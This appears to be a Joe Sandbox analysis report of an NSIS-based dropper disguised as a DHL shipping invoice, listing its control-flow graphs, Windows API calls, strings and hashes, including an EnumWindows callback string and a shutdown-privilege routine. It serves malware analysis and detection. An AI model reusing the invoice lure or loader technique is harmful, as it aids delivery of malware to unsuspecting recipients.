73a426b8 4625->4692 4628 73a42abe 4626->4628 4627 73a42b63 EnumWindows 4629 73a42b81 4627->4629 4628->4627 4695 73a42a56 4629->4695 4631 73a42c4d 4631->4551 4633 73a42367 4632->4633 4634 73a42372 GlobalAlloc 4633->4634 4635 73a417c8 4633->4635 4634->4633 4635->4546 4640 73a42754 4636->4640 4637 73a42802 4639 73a42808 GlobalSize 4637->4639 4641 73a42812 4637->4641 4638 73a427ef GlobalAlloc 4638->4641 4639->4641 4640->4637 4640->4638 4641->4571 4643 73a42d42 4642->4643 4644 73a42d82 GlobalFree 4643->4644 4699 73a4121b GlobalAlloc 4645->4699 4647 73a425ec MultiByteToWideChar 4651 73a42573 4647->4651 4648 73a4260e StringFromGUID2 4648->4651 4649 73a4261f lstrcpynW 4649->4651 4650 73a42656 GlobalFree 4650->4651 4651->4647 4651->4648 4651->4649 4651->4650 4652 73a42632 wsprintfW 4651->4652 4653 73a4268b GlobalFree 4651->4653 4654 73a41272 2 API calls 4651->4654 4700 73a412e1 4651->4700 4652->4651 4653->4564 4654->4651 4704 73a4121b GlobalAlloc 4656->4704 4658 73a415b9 4659 73a415c6 2 API calls 4658->4659 4660 73a415c3 4659->4660 4661 73a41272 4660->4661 4662 73a412b5 GlobalFree 4661->4662 4663 73a4127b GlobalAlloc lstrcpynW 4661->4663 4662->4568 4663->4662 4665 73a415d2 wsprintfW 4664->4665 4666 73a415ff lstrcpyW 4664->4666 4669 73a41618 4665->4669 4666->4669 4669->4572 4671 73a4253a 4670->4671 4673 73a41891 4670->4673 4672 73a42556 GlobalFree 4671->4672 4671->4673 4672->4671 4673->4579 4673->4580 4675 73a41272 2 API calls 4674->4675 4676 73a4155e 4675->4676 4676->4574 4677->4584 4678->4605 4680 73a415ad 4679->4680 4680->4611 4687 73a4121b GlobalAlloc 4681->4687 4683 73a4123b lstrcpynW 4683->4606 4684->4615 4685->4607 4686->4610 4687->4683 4689 73a412c1 4688->4689 4690 73a4122c 2 API calls 4689->4690 4691 73a412df 4690->4691 4691->4618 4693 73a426c6 VirtualAlloc 4692->4693 4694 73a4271c 4692->4694 4693->4694 4694->4625 4696 73a42a61 4695->4696 4697 73a42a66 GetLastError 4696->4697 4698 73a42a71 4696->4698 4697->4698 4698->4631 4699->4651 4701 73a4130c 4700->4701 4702 73a412ea 4700->4702 4701->4651 4702->4701 4703 73a412f0 lstrcpyW 4702->4703 4703->4701 4704->4658 5560 73a42c57 5561 73a42c6f 5560->5561 5562 73a4158f 2 API calls 5561->5562 5563 73a42c8a 5562->5563 5564 402a35 5565 402c1f 17 API calls 5564->5565 5566 402a3b 5565->5566 5567 402a72 5566->5567 5568 40288b 5566->5568 5570 402a4d 5566->5570 5567->5568 5569 4062dc 17 API calls 5567->5569 5569->5568 5570->5568 5572 406201 wsprintfW 5570->5572 5572->5568 5573 401735 5574 402c41 17 API calls 5573->5574 5575 40173c SearchPathW 5574->5575 5576 4029e6 5575->5576 5577 401757 5575->5577 5577->5576 5579 4062ba lstrcpynW 5577->5579 5579->5576 5580 4014b8 5581 4014be 5580->5581 5582 401389 2 API calls 5581->5582 5583 4014c6 5582->5583 5584 401db9 GetDC 5585 402c1f 17 API calls 5584->5585 5586 401dcb GetDeviceCaps MulDiv ReleaseDC 5585->5586 5587 402c1f 17 API calls 5586->5587 5588 401dfc 5587->5588 5589 4062dc 17 API calls 5588->5589 5590 401e39 CreateFontIndirectW 5589->5590 5591 402592 5590->5591 5592 40283b 5593 402843 5592->5593 5594 402847 FindNextFileW 5593->5594 5595 402859 5593->5595 5594->5595 5596 4029e6 5595->5596 5598 4062ba lstrcpynW 5595->5598 5598->5596 5599 73a41058 5601 73a41074 5599->5601 5600 73a410dd 5601->5600 5602 73a41516 GlobalFree 5601->5602 5603 73a41092 5601->5603 5602->5603 5604 73a41516 GlobalFree 5603->5604 5605 73a410a2 5604->5605 5606 73a410b2 5605->5606 5607 73a410a9 GlobalSize 5605->5607 5608 73a410b6 GlobalAlloc 5606->5608 5609 73a410c7 5606->5609 5607->5606 5610 73a4153d 3 API calls 5608->5610 5611 73a410d2 GlobalFree 5609->5611 5610->5609 5611->5600 5612 73a418d9 5613 73a418fc 5612->5613 5614 73a41931 GlobalFree 5613->5614 5615 73a41943 5613->5615 5614->5615 5616 73a41272 2 API calls 5615->5616 5617 73a41ace GlobalFree GlobalFree 5616->5617

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 8 4033d8 1->8 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 8->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 36 403633-40364d DeleteFileW call 402edd 29->36 37 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->37 30->30 30->31 34 4034c5-4034c9 31->34 35 4034ca-4034ce 31->35 34->35 38 4034d4-4034da 35->38 39 40358d-40359a call 405bbc 35->39 57 403653-403659 36->57 58 4036fe-40370e call 4038d0 OleUninitialize 36->58 37->36 53 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 37->53 43 4034f5-40352e 38->43 44 4034dc-4034e4 38->44 55 40359c-40359d 39->55 56 40359e-4035a4 39->56 50 403530-403535 43->50 51 40354b-403585 43->51 48 4034e6-4034e9 44->48 49 4034eb 44->49 48->43 48->49 49->43 50->51 52 403537-40353f 50->52 51->39 54 403587-40358b 51->54 60 403541-403544 52->60 61 403546 52->61 53->36 53->58 54->39 63 4035ac-4035ba call 4062ba 54->63 55->56 56->28 64 4035aa 56->64 65 4036ee-4036f5 call 4039aa 57->65 66 40365f-40366a call 405bbc 57->66 73 403834-40383a 58->73 74 403714-403724 call 405920 ExitProcess 58->74 60->51 60->61 61->51 69 4035bf 63->69 64->69 76 4036fa 65->76 80 4036b8-4036c2 66->80 81 40366c-4036a1 66->81 69->29 78 4038b8-4038c0 73->78 79 40383c-403852 GetCurrentProcess OpenProcessToken 73->79 76->58 82 4038c2 78->82 83 4038c6-4038ca ExitProcess 78->83 87 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403888-403896 call 406694 79->88 85 4036c4-4036d2 call 405c97 80->85 86 40372a-40373e call 40588b lstrcatW 80->86 89 4036a3-4036a7 81->89 82->83 85->58 99 4036d4-4036ea call 4062ba * 2 85->99 100 403740-403746 lstrcatW 86->100 101 40374b-403765 lstrcatW lstrcmpiW 86->101 87->88 102 4038a4-4038af ExitWindowsEx 88->102 103 403898-4038a2 88->103 90 4036b0-4036b4 89->90 91 4036a9-4036ae 89->91 90->89 95 4036b6 90->95 91->90 91->95 95->80 99->65 100->101 101->58 106 403767-40376a 101->106 102->78 104 4038b1-4038b3 call 40140b 102->104 103->102 103->104 104->78 109 403773 call 40586e 106->109 110 40376c-403771 call 4057f1 106->110 115 403778-403786 SetCurrentDirectoryW 109->115 110->115 118 403793-4037bc call 4062ba 115->118 119 403788-40378e call 4062ba 115->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->58 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000020,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                                                        • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,user32::EnumWindows(i r1 ,i 0),00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
                                                                                                                                                                                                                                      • API String ID: 3441113951-1090621446
                                                                                                                                                                                                                                      • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                                      • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 343 4059cc-4059f2 call 405c97 346 4059f4-405a06 DeleteFileW 343->346 347 405a0b-405a12 343->347 348 405b88-405b8c 346->348 349 405a14-405a16 347->349 350 405a25-405a35 call 4062ba 347->350 351 405b36-405b3b 349->351 352 405a1c-405a1f 349->352 356 405a44-405a45 call 405bdb 350->356 357 405a37-405a42 lstrcatW 350->357 351->348 355 405b3d-405b40 351->355 352->350 352->351 358 405b42-405b48 355->358 359 405b4a-405b52 call 4065fd 355->359 360 405a4a-405a4e 356->360 357->360 358->348 359->348 366 405b54-405b68 call 405b8f call 405984 359->366 363 405a50-405a58 360->363 364 405a5a-405a60 lstrcatW 360->364 363->364 367 405a65-405a81 lstrlenW FindFirstFileW 363->367 364->367 383 405b80-405b83 call 405322 366->383 384 405b6a-405b6d 366->384 369 405a87-405a8f 367->369 370 405b2b-405b2f 367->370 371 405a91-405a99 369->371 372 405aaf-405ac3 call 4062ba 369->372 370->351 374 405b31 370->374 375 405a9b-405aa3 371->375 376 405b0e-405b1e FindNextFileW 371->376 385 405ac5-405acd 372->385 386 405ada-405ae5 call 405984 372->386 374->351 375->372 379 405aa5-405aad 375->379 376->369 382 405b24-405b25 FindClose 376->382 379->372 379->376 382->370 383->348 384->358 387 405b6f-405b7e call 405322 call 406080 384->387 385->376 388 405acf-405ad8 call 4059cc 385->388 396 405b06-405b09 call 405322 386->396 397 405ae7-405aea 386->397 387->348 388->376 396->376 400 405aec-405afc call 405322 call 406080 397->400 401 405afe-405b04 397->401 400->376 401->376
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 004059F5
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 00405A3D
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 00405A60
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 00405A66
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 00405A76
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                                                                                                      • \*.*, xrefs: 00405A37
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", xrefs: 004059CC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                      • API String ID: 2035342205-3769941819
                                                                                                                                                                                                                                      • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                                      • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,757C3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,757C3420), ref: 00406608
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406614
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                      • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                                      • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 139 4039aa-4039c2 call 406694 142 4039c4-4039d4 call 406201 139->142 143 4039d6-403a0d call 406188 139->143 151 403a30-403a59 call 403c80 call 405c97 142->151 147 403a25-403a2b lstrcatW 143->147 148 403a0f-403a20 call 406188 143->148 147->151 148->147 157 403aeb-403af3 call 405c97 151->157 158 403a5f-403a64 151->158 164 403b01-403b26 LoadImageW 157->164 165 403af5-403afc call 4062dc 157->165 158->157 159 403a6a-403a92 call 406188 158->159 159->157 168 403a94-403a98 159->168 166 403ba7-403baf call 40140b 164->166 167 403b28-403b58 RegisterClassW 164->167 165->164 182 403bb1-403bb4 166->182 183 403bb9-403bc4 call 403c80 166->183 170 403c76 167->170 171 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 167->171 173 403aaa-403ab6 lstrlenW 168->173 174 403a9a-403aa7 call 405bbc 168->174 175 403c78-403c7f 170->175 171->166 176 403ab8-403ac6 lstrcmpiW 173->176 177 403ade-403ae6 call 405b8f call 4062ba 173->177 174->173 176->177 181 403ac8-403ad2 GetFileAttributesW 176->181 177->157 185 403ad4-403ad6 181->185 186 403ad8-403ad9 call 405bdb 181->186 182->175 192 403bca-403be4 ShowWindow call 406624 183->192 193 403c4d-403c55 call 4053f5 183->193 185->177 185->186 186->177 200 403bf0-403c02 GetClassInfoW 192->200 201 403be6-403beb call 406624 192->201 198 403c57-403c5d 193->198 199 403c6f-403c71 call 40140b 193->199 198->182 204 403c63-403c6a call 40140b 198->204 199->170 202 403c04-403c14 GetClassInfoW RegisterClassW 200->202 203 403c1a-403c4b DialogBoxParamW call 40140b call 4038fa 200->203 201->200 202->203 203->175 204->182
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                                        • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,757C3420,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",00000000), ref: 00403A2B
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes), ref: 00403B12
                                                                                                                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                                                                      Strings
